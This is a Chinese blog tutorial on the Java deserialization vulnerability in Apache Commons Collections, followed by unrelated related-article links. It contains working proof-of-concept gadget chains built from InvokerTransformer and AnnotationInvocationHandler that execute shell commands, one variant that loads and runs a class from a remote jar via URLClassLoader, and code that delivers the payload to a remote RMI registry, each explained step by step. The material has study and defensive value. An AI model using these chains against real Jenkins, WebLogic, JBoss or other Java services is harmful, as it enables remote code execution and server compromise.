Java反序列化漏洞详解
lipiwang 2025-05-26 17:14 10 浏览 0 评论
Java反序列化漏洞从爆出到现在快2个月了,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具。本文对于Java反序列化的漏洞简述后,并对于Java反序列化的Poc进行详细解读。
Java反序列化漏洞简介
Java序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,Java中的ObjectOutputStream类的writeObject()方法可以实现序列化。
Java反序列化即逆过程,由字节流还原成对象。ObjectInputStream类的readObject()方法用于反序列化。
因此要利用Java反序列化漏洞,需要在进行反序列化的地方传入攻击者的序列化代码。能符合以上条件的地方即存在漏洞。
Java反序列化Poc详解
12345678910111213141516171819202122232425262728293031323334353637383940 | publicclasstest{publicstaticvoidmain(String[]args)throwsException{String[]execArgs=newString[]{"sh","-c","whoami > /tmp/fuck"};Transformer[]transformers=newTransformer[]{newConstantTransformer(Runtime.class),newInvokerTransformer("getMethod",newClass[]{String.class,Class[].class},newObject[]{"getRuntime",newClass[0]}),newInvokerTransformer("invoke",newClass[]{Object.class,Object[].class},newObject[]{null,null}),newInvokerTransformer("exec",newClass[]{String[].class},newObject[]{execArgs})};Transformer transformedChain=newChainedTransformer(transformers);Map<String,String>BeforeTransformerMap=newHashMap<String,String>();BeforeTransformerMap.put("hello","manning");Map AfterTransformerMap=TransformedMap.decorate(BeforeTransformerMap,null,transformedChain);Classcl=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor ctor=cl.getDeclaredConstructor(Class.class,Map.class);ctor.setAccessible(true);Objectinstance=ctor.newInstance(Target.class,AfterTransformerMap);Filef=newFile("temp.bin");ObjectOutputStream out=newObjectOutputStream(newFileOutputStream(f));out.writeObject(instance);}} |
如果想彻底理解上面的poc,需要明白Java中的一些概念。
在Apache commons工具包中有很多jar包(jar包可以理解为python的库),具体jar包里面含有的内容,如下图所示。
其中Java反序列化的问题出在
org.apache.commons.collections这个库里面。
org.apache.commons.collections提供一个类包来扩展和增加标准的Java的collection框架,也就是说这些扩展也属于collection的基本概念,只是功能不同罢了。Java中的collection可以理解为一组对象,collection里面的对象称为collection的对象。具象的collection为set,list,queue等等。换一种理解方式,collection是set,list,queue的抽象,collection中文含义是收集的意思,那么收集的具体方式就可以是set,list,queue了。
在
org.apache.commons.collections内提供了一个接口类叫Transformer,这个接口的英文定义为
Defines a functor interface implemented by classes that transform one object into another.
也就是说接口于Transformer的类都具备把一个对象转化为另一个对象的功能。目前已知接口于Transformer的类,如下如所示。
图上带箭头指示的为Java反序列化漏洞的poc含有的类。
ConstantTransformer
Transformer implementation that returns the same constant each time. (把一个对象转化为常量,并返回)
InvokerTransformer
Transformer implementation that creates a new object instance by reflection. (通过反射,返回一个对象)
ChainedTransformer
Transformer implementation that chains the specified transformers together. (把一些transformer链接到一起,构成一组链条,对一个对象依次通过链条内的每一个transformer进行转换)
有了以上的相关概念,就可以理解最开始的poc了。poc里面,我们一共创建了以下关键对象。
execArgs
待执行的命令数组
transformers
一个transformer链,包含预设转化逻辑(各类transformer对象)的转化数组
transformedChain
ChainedTransformer类对象,传入transformers数组,可以按照transformers数组的逻辑执行转化操作
BeforeTransformerMap
Map数据结构,转换前的Map,Map数据结构内的对象是键值对形式,类比于python的dict理解即可
AfterTransformerMap
Map数据结构,转换后的Map
整个poc的逻辑可以这么理解,构建了BeforeTransformerMap的键值对,为其赋值,利用TransformedMap的decorate方法,可以对Map数据结构的key,value进行transforme。
TransformedMap.decorate方法,预期是对Map类的数据结构进行转化,该方法有三个参数。第一个参数为待转化的Map对象,第二个参数为Map对象内的key要经过的转化方法(可为单个方法,也可为链,也可为空),第三个参数为Map对象内的value要经过的转化方法。
TransformedMap.decorate(目标Map, key的转化对象(单个或者链或者null), value的转化对象(单个或者链或者null));
上图是调试时的转换变量内容,可以很清楚地看到执行完poc后,已经对Map的value进行了转换(过了一遍transformer链)。
poc中对BeforeTransformerMap的value进行转换,当BeforeTransformerMap的value执行完一个完整转换链,就完成了命令执行。
在进行反序列化时,我们会调用ObjectInputStream类的readObject()方法。如果被反序列化的类重写了readObject(),那么该类在进行反序列化时,Java会优先调用重写的readObject()方法。
结合前述Commons Collections的特性,如果某个可序列化的类重写了readObject()方法,并且在readObject()中对Map类型的变量进行了键值修改操作,并且这个Map变量是可控的,就可以实现我们的攻击目标了。
因此我们在poc中看见了下行的代码。
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
这个类完全符合我们的要求,具体解释可以查看TSRC的文章。
如果要实现一个可控的poc,需要对transformer链的构造进行理解。首先来看InvokerTransformer。
InvokerTransformer(String methodName, Class[] paramTypes, Object[] args)
12 | InvokerTransformer(StringmethodName,Class[]paramTypes,Object[]args) |
参数依次为:方法名称,参数类型,参数对象 我们找其中一个来看下。
12345678910111213141516 | newInvokerTransformer("getMethod",newClass[]{String.class,Class[].class},newObject[]{"getRuntime",newClass[0]}),newInvokerTransformer("invoke",newClass[]{Object.class,Object[].class},newObject[]{null,null}),newInvokerTransformer("exec",newClass[]{String.class},newObject[]{"gedit"}) |
参数类型里面的内容完全对应于参数对象里的内容。
PS:由于Method类的invoke(Object obj,Object args[])方法的定义,所以在反射内写new Class[] {Object.class, Object[].class }。
所以正常流程如下所示:
((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("gedit");
基于报错的反序列化transformer链
1234567891011121314151617181920212223242526272829 | Transformer[]transformers=newTransformer[]{newConstantTransformer(Java.net.URLClassLoader.class),newInvokerTransformer("getConstructor",newClass[]{Class[].class},newObject[]{newClass[]{Java.net.URL[].class}}),newInvokerTransformer("newInstance",newClass[]{Object[].class},newObject[]{newObject[]{newJava.net.URL[]{newJava.net.URL(url)}}}),newInvokerTransformer("loadClass",newClass[]{String.class},newObject[]{"ErrorBaseExec"}),newInvokerTransformer("getMethod",newClass[]{String.class,Class[].class},newObject[]{"do_exec",newClass[]{String.class}}),newInvokerTransformer("invoke",newClass[]{Object.class,Object[].class},newObject[]{null,newString[]{cmd}})}; |
有了先前的理解,这个链就很明了了。先建立一个读取远程jar文件的类 URLClassLoader,实例化这个类,传入要访问的url,再读取远程加载类,接着获取类方法,然后反射这个方法。
关于RMI利用的相关内容
tang3已经在RMI利用文章讲过怎么利用了,这段内容,我只是详解下给出的poc的原理。
poc部分内容
123456789101112131415161718192021222324 | Transformer transformedChain=newChainedTransformer(transformers);Map BeforeTransformerMap=newHashMap();innerMap.put("value","value");Map AfterTransformerMap=TransformedMap.decorate(BeforeTransformerMap,null,transformedChain);Classcl=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor ctor=cl.getDeclaredConstructor(Class.class,Map.class);ctor.setAccessible(true);Objectinstance=ctor.newInstance(Target.class,AfterTransformerMap);InvocationHandlerh=(InvocationHandler)instance;Remoter=Remote.class.cast(Proxy.newProxyInstance(Remote.class.getClassLoader(),newClass[]{Remote.class},h));try{Registry registry=LocateRegistry.getRegistry(ip,port);registry.rebind("",r);// r is remote obj}catch(Throwablee){e.printStackTrace();} |
RMI利用的poc看上去还是很熟悉的,因为到建立instance时,还和之前的内容一致。之后便到了RMI内容独有的细节,从代码角度可以看出利用逻辑为:
建立实例对象instance
实例对象instance 转化为 InvocationHandler类型的句柄h(因为instance是序列化后的内容,所以instance就是一串数据)
把句柄h附载到Remote类实例 r上
向远程服务器注册,得到远程注册对象 registry
向远程注册对象registry注册 实例r
在Java的RMI中,我们允许向远程已运行的jvm虚拟环境中绑定(rebind函数,也可以理解为添加)一些实例对象,通过RMI协议传输一些序列化好的内容,这样服务端解析(也就是反序列化)传过来的数据后,便可把解析后的内容添加到运行环境中。构造remote类型实例r 方法很多,poc中利用动态代理创建remote实例r是方法之一。
因此涉及RMI的代码也会存在Java反序列化漏洞。
漏洞影响分析
Java反序列化漏洞从爆出到现在快2个月了。最开始的只能命令执行和反弹shell,到后来的有回显的命令执行,到最终的代码执行,利用上来是越来越方便(有回显的命令执行和代码执行均为利用远程jar文件的利用形式)。从微博来看,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具。待最终利用工具公布,此漏洞还会有一个上升趋势的影响。
资料引用
http://blog.chaitin.com/2015-11-11_java_unserialize_rce/
http://security.tencent.com/index.php/blog/msg/97
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
http://www.infoq.com/cn/articles/cf-java-object-serialization-rmi
http://blog.nsfocus.net/learning-guide-java-serialization-de-serialization-vulnerability-remediation/
http://blog.nsfocus.net/java-deserialization-vulnerability-overlooked-mass-destruction/
如果您需要了解更多内容,可以
加入QQ群:486207500
- 上一篇:深入理解序列化
- 下一篇:Java编程核心技巧大揭秘
相关推荐
- linux实例之设置时区的方式有哪些
-
linux系统下的时间管理是一个复杂但精细的功能,而时区又是时间管理非常重要的一个辅助功能。时区解决了本地时间和UTC时间的差异,从而确保了linux系统下时间戳和时间的准确性和一致性。比如文件的时间...
- Linux set命令用法(linux cp命令的用法)
-
Linux中的set命令用于设置或显示系统环境变量。1.设置环境变量:-setVAR=value:设置环境变量VAR的值为value。-exportVAR:将已设置的环境变量VAR导出,使其...
- python环境怎么搭建?小白看完就会!简简单单
-
很多小伙伴安装了python不会搭建环境,看完这个你就会了Python可应用于多平台包括Linux和MacOSX。你可以通过终端窗口输入"python"命令来查看本地是否...
- Linux环境下如何设置多个交叉编译工具链?
-
常见的Linux操作系统都可以通过包管理器安装交叉编译工具链,比如Ubuntu环境下使用如下命令安装gcc交叉编译器:sudoapt-getinstallgcc-arm-linux-gnueab...
- JMeter环境变量配置技巧与注意事项
-
通过给JMeter配置环境变量,可以快捷的打开JMeter:打开终端。执行jmeter。配置环境变量的方法如下。Mac和Linux系统在~/.bashrc中加如下内容:export...
- C/C++|头文件、源文件分开写的源起及作用
-
1C/C++编译模式通常,在一个C++程序中,只包含两类文件——.cpp文件和.h文件。其中,.cpp文件被称作C++源文件,里面放的都是C++的源代码;而.h文件则被称...
- linux中内部变量,环境变量,用户变量的区别
-
unixshell的变量分类在Shell中有三种变量:内部变量,环境变量,用户变量。内部变量:系统提供,不用定义,不能修改环境变量:系统提供,不用定义,可以修改,可以利用export将用户变量转为环...
- 在Linux中输入一行命令后究竟发生了什么?
-
Linux,这个开源的操作系统巨人,以其强大的命令行界面而闻名。无论你是初学者还是经验丰富的系统管理员,理解在Linux终端输入一条命令并按下回车后发生的事情,都是掌握Linux核心的关键。从表面上看...
- Nodejs安装、配置与快速入门(node. js安装)
-
Nodejs是现代JavaScript语言产生革命性变化的一个主要框架,它使得JavaScript从一门浏览器语言成为可以在服务器端运行、开发各种各样应用的通用语言。在不同的平台下,Nodejs的安装...
- Ollama使用指南【超全版】(olaplex使用方法图解)
-
一、Ollama快速入门Ollama是一个用于在本地运行大型语言模型的工具,下面将介绍如何在不同操作系统上安装和使用Ollama。官网:https://ollama.comGithub:http...
- linux移植(linux移植lvgl)
-
1uboot移植l移植linux之前需要先移植一个bootlader代码,主要用于启动linux内核,lLinux系统包括u-boot、内核、根文件系统(rootfs)l引导程序的主要作用将...
- Linux日常小技巧参数优化(linux参数调优)
-
Linux系统参数优化可以让系统更加稳定、高效、安全,提高系统的性能和使用体验。下面列出一些常见的Linux系统参数优化示例,包括修改默认配置、网络等多方面。1.修改默认配置1.1修改默认编辑器默...
- Linux系统编程—条件变量(linux 条件变量开销)
-
条件变量是用来等待线程而不是上锁的,条件变量通常和互斥锁一起使用。条件变量之所以要和互斥锁一起使用,主要是因为互斥锁的一个明显的特点就是它只有两种状态:锁定和非锁定,而条件变量可以通过允许线程阻塞和等...
- 面试题-Linux系统优化进阶学习(linux系统的优化)
-
一.基础必备优化:1.关闭SElinux2.FirewalldCenetOS7Iptables(C6)安全组(阿里云)3.网络管理服务||NetworkManager|network...
- 嵌入式Linux开发教程:Linux Shell
-
本章重点介绍Linux的常用操作和命令。在介绍命令之前,先对Linux的Shell进行了简单介绍,然后按照大多数用户的使用习惯,对各种操作和相关命令进行了分类介绍。对相关命令的介绍都力求通俗易懂,都给...
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- maven镜像 (69)
- undefined reference to (60)
- zip格式 (63)
- oracle over (62)
- date_format函数用法 (67)
- 在线代理服务器 (60)
- shell 字符串比较 (74)
- x509证书 (61)
- localhost (65)
- java.awt.headless (66)
- syn_sent (64)
- settings.xml (59)
- 弹出窗口 (56)
- applicationcontextaware (72)
- my.cnf (73)
- httpsession (62)
- pkcs7 (62)
- session cookie (63)
- java 生成uuid (58)
- could not initialize class (58)
- beanpropertyrowmapper (58)
- word空格下划线不显示 (73)
- jar文件 (60)
- jsp内置对象 (58)
- makefile编写规则 (58)